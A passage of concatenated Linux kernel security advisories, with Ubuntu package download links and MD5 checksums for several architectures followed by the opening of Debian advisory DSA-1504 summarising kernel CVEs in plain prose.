http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    55986 818a768f789118a2e230f02814ccee07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    56894 a95b43adb1d7c38a345d2ae6c0d99758\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   360272 2165710ca78753041b68faa06e2fd6f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   363224 cb58c41c58379d43b0b72e7ab8127463\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    63168 ffacab575e4656018c9f9893623b858c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    63822 96a875eae075925fad17dde480adafe7\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.32_i386.deb\n      Size/MD5: 23844470 3bd0cf01bdc633260ef0d310c00f2ffc\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.32_i386.deb\n      Size/MD5: 24184730 f4b2abed85345ac1054717b86b587cf5\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   328858 d6f5924f4e46394f3f8b0255d05f537f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   325600 ab19f82d372591331f9964a86c73d841\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    41188 8b66f7291f4a2d261ddd4ba8a93f8567\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    47450 bab266d30c1b8dbcd9dc3ef168df29d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   219678 325f5837771c9638b08dd3eb30bab314\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   239174 50fbf4f2acd9dcff0fc25d1266ac4c3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    43652 0b28da2e498d294896670e9eb12b907f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    39780 300754124c0d20b61f382004d4e058a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   717792 ffe8ceda1b479995af571081878f3f07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   776476 e54e5b90d9ca522f68f6a45a716ef5d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   205066 3958102c34ff26f761bc3f45be13ebdc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   209730 90c93b39b98c6b13723fa7a1fbf6ffa0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    59218 b82dd9ffdd59e5908ce712dacda00ae6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    66858 6067376216b513e3995675baa0b5f82b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    64204 798e06a268e472b302ac454923bb8fff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    65326 9bb7b418effcabd5475064b802298513\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   144018 f89fc6a4bde46e09fd834ec2c1d0be34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   162726 8783bd1c8e200777fd0e15cc56fe7e27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   383360 7a9030fdb88ccbf2e89ce3b715573e22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   251804 a96beb008b4c309fea0b2c70fa4a0701\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:  2157386 6eedcab4ef93369216268e2f8b0c26d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:  3083266 6c385c18cb2c37a7daade1a05bec7f04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc-smp_2.6.20-16.32_powerpc.deb\n      Size/MD5:   867372 b754e4a9e0afa690e32edd569293e9db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc64-smp_2.6.20-16.32_powerpc.deb\n      Size/MD5:   872512 90df82454a635f1c87711ab7153baef9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-powerpc_2.6.20-16.32_powerpc.deb\n      Size/MD5:   867756 f9a2940c66d49b3ca08ed5727f289a6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_powerpc.deb\n      Size/MD5:  8150058 fd6f76d544b89ef32463788c42c5c2d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc-smp_2.6.20-16.32_powerpc.deb\n      Size/MD5: 24516198 a2f8d2fc427fe4cdb83ea6601e5ef3e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc64-smp_2.6.20-16.32_powerpc.deb\n      Size/MD5: 26857866 2bb21d740c71e6e88e1ebd9e599ce242\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-powerpc_2.6.20-16.32_powerpc.deb\n      Size/MD5: 24217722 2f3a2276e62c30a7ee1bcc4375b2e5b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc-smp_2.6.20-16.32_powerpc.deb\n      Size/MD5:  2127364 92acf167bdd7d6f1e45334ac47ea30e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc64-smp_2.6.20-16.32_powerpc.deb\n      Size/MD5:  2853718 1f3937836ac7988cfc8120fa1c8f3f0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-powerpc_2.6.20-16.32_powerpc.deb\n      Size/MD5:  2049008 754fb343fde63edba537f4997059d246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_powerpc.deb\n      Size/MD5:   644216 aa89e704afe7bb649a3702a3e80bdbc9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   253014 53f79f58e8c8c8c6a91f5a6fa68b3323\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   295090 27b41c8c7bce8577d2fc92ee91ff02fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   155552 948610c5856311a389cc24147c51b4c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   168440 0ae30519a5c6845c1df222dd0997a830\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   248186 10ab9437d64b36107f135d8b1e8384a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   279958 a2a840b34ef74ba6ea055ae6ed25aa68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:  1110518 cdae9930bc591ed0d464c0e627ce9fc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:  1110674 cf7767bcf24b10a6468a001cc61a705f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:  1951232 50acb8ab3ce0c1068b7db1cb83c8b803\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:  2253534 7e377ce517ec668fbdffdf8cf68bbb8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   233498 a911deb6f677d23573e2c04d21cd4c0b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   223084 d1d5b711af7b606cc3cb152cd2b302f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   172826 e224814b4f4cb3a4857ef0bcf1807660\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   205452 b7e452eed99d75a3237cd6af0b652751\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   280976 36b2890d2776223330cb998ef91fe7a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   316592 6058abd33a87379478812445a4ce6152\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    44654 429c32a7686b6994e51008ad510addef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    43404 2b938cd722e60e0c8a7bc162d9c9b23b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    41214 9d76ac755e0135b9ac5929f737d8df92\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    53676 f9d8fb50d39d9533195aeccfde6aeb06\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    72808 7e1591057c11080e073a7d1308079e03\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    85286 408f3cca715bdbadedf3c88add2d7942\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    74538 9371b8ecda2dc38409eb7f5e81323382\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    29716 915f7e92919e3e5f6a714fb6a764e7c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:     8396 6fff7a2df52f845977fb0391065c9eb4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:     9876 1bb149a422eecea6437b3096455a7214\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    56160 3b23cbe3a708bd41208df683665c99a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    67412 b805f503e4e4a9172093732085ee3258\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    86632 65853e2605f97918c2da7d3714d47f9c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   129216 02647d33297ca3a79309e3d85c7af63b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   322568 dfb941aaf4550bf6126c0169f83258f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   322594 4baf1f3fa8df218422fadab681fb213b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:  1415796 56f376a091bf794cad12803e8ea9223a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:  1345418 d86ddf950d422e5dff25b4ff75be8be0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    74226 ffc5e0c6c3c9ba36f8a70bdda703ffd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    83236 016e73b6c71ea3e6ce50fc6e9e400733\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    12016 38db6e08e04535827c310f6f3b75bb8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    13944 59f761c4730861063999252fd9c7b3f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    78348 e105eefca5ef971dfebaa7db9922fa7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    85460 13a378acfc0739831360f256098c6e2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   398178 14adf5249c5f2b7b697ee2951e65ab6b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   445184 0014efb118af6d57ca7012d50abfde25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:    76714 e53854cc5527187805a655bd505e4fcb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb\n      Size/MD5:   100182 5de41587783ba1ceebcaca202d46bdbd\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:    53734 6adc5476b8288e943d269fe136f9597e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:    42162 7419be9e0f5436873f2a40e52c1afd31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   211714 1d9919982182d8ed7578eb9e9c4bb6fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   607894 d46f67e29a5655fde3a34b4148e34b20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   142712 5e8e8dbf4cd995f76e17b2fbecb04364\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:    51446 16795f24d7cdb9fa4021e2a9c2f5ddf9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:    37416 d33bb0862b56b544342582b47d43c5bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   151158 048512894c8d13521481dbd2eb596c70\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:  1930624 f875b4fa41f898441804a75dac77a6b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64-smp_2.6.20-16.32_sparc.deb\n      Size/MD5:   779972 fca011328622db95da614823eb859877\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-sparc64_2.6.20-16.32_sparc.deb\n      Size/MD5:   778754 2a07efbbbf11de98f41c6acaf204d688\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_sparc.deb\n      Size/MD5:  8120614 63034f7095956cf9e0482a70f17b4268\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64-smp_2.6.20-16.32_sparc.deb\n      Size/MD5: 16954948 4118b2381a068300bca6dbd218274359\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-sparc64_2.6.20-16.32_sparc.deb\n      Size/MD5: 16591664 75cc0965716c29a3fcea210c9e9568a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64-smp_2.6.20-16.32_sparc.deb\n      Size/MD5:  2263152 880c4d7bc6a681ea4d44a6422b470bd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-sparc64_2.6.20-16.32_sparc.deb\n      Size/MD5:  2177076 96a928cc6852bab2880404ee864b8513\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_sparc.deb\n      Size/MD5:   699392 04a5aa594fd799d6d28d1e448082ff53\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   264350 70461d55e370af1410e7076ee7707293\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   156580 d912fb65f3dfebe6abb54731f1482469\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   241030 8e8cfa59c4eb226e54508975e86ae4be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:  1110530 e5514e1ad110fd4fda4bd241e89786ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:  1571944 468cbc5568cd30adf5c7df1c2a8b717b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   180396 b0cfe237ce9422954dbccc5fdfe083b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   310090 fff041405cf72a7036b2108c5927d687\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:    39670 682731910162d545b9de9f43a94303ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:    37986 d9c40538f074c1b736fa85436bb5c267\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:     8646 5754f2b90039fdc8828d72e5a11f0b0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:    59416 bb6cb420320b901278779187ccda14dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:    90822 fe71fffbab34ef164725a453777bbc69\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   322568 eeb3653225a6d79ca5439c35016a0ed5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   882448 1c0cf5b18dc1b87f6d492c95c2db8631\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:     9828 7acb6badfb2aff16e367c3f41138e8ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:   290228 5a13e5423896527a1198f5ccbc13152e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-sparc64-di_2.6.20-16.32_sparc.udeb\n      Size/MD5:    54800 878d9b94c8b02143f8a84063365fd340\n\n. \n\nCVE-2007-4849\n\n    Michael Stone reported an issue with the JFFS2 filesystem. Legacy\n    modes for inodes that were created with POSIX ACL support enabled\n    were not being written out to the medium, resulting in incorrect\n    permissions upon remount. \n\nThese problems have been fixed in the stable distribution in version \n2.6.18.dfsg.1-13etch3. \n\nAt the time of this advisory, the build for the arm architecture has\nnot yet completed. This advisory will be updated once the arm build\nis available. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1504                  security@debian.org\nhttp://www.debian.org/security/                           dann frazier\nFebruary 22, 2008                   http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage        : kernel-source-2.6.8 (2.6.8-17sarge1)\nVulnerability  : several\nProblem-Type   : local\nDebian-specific: no\nCVE ID         : CVE-2006-5823 CVE-2006-6054 CVE-2006-6058 CVE-2006-7203\n                 CVE-2007-1353 CVE-2007-2172 CVE-2007-2525 CVE-2007-3105\n                 CVE-2007-3739 CVE-2007-3740 CVE-2007-3848 CVE-2007-4133\n                 CVE-2007-4308 CVE-2007-4573 CVE-2007-5093 CVE-2007-6063\n                 CVE-2007-6151 CVE-2007-6206 CVE-2007-6694 CVE-2008-0007\n\nSeveral local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. The Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2006-5823\n\n    LMH reported a potential local DoS which could be exploited by a malicious\n    user with the privileges to mount and read a corrupted cramfs filesystem. \n\nCVE-2006-6054\n\n    LMH reported a potential local DoS which could be exploited by a malicious\n    user with the privileges to mount and read a corrupted ext2 filesystem. \n\nCVE-2006-6058\n\n    LMH reported an issue in the minix filesystem that allows local users\n    with mount privileges to create a DoS (printk flood) by mounting a\n    specially crafted corrupt filesystem. \n\nCVE-2006-7203\n\n    OpenVZ Linux kernel team reported an issue in the smbfs filesystem which\n    can be exploited by local users to cause a DoS (oops) during mount. \n\nCVE-2007-1353\n\n    Ilja van Sprundel discovered that kernel memory could be leaked via the\n    Bluetooth setsockopt call due to an uninitialized stack buffer. This\n    could be used by local attackers to read the contents of sensitive kernel\n    memory. \n\nCVE-2007-2172\n\n    Thomas Graf reported a typo in the DECnet protocol handler that could\n    be used by a local attacker to overrun an array via crafted packets,\n    potentially resulting in a Denial of Service (system crash). \n    A similar issue exists in the IPV4 protocol handler and will be fixed\n    in a subsequent update. \n\nCVE-2007-2525\n\n    Florian Zumbiehl discovered a memory leak in the PPPOE subsystem caused\n    by releasing a socket before PPPIOCGCHAN is called upon it. \n\nCVE-2007-3105\n\n    The PaX Team discovered a potential buffer overflow 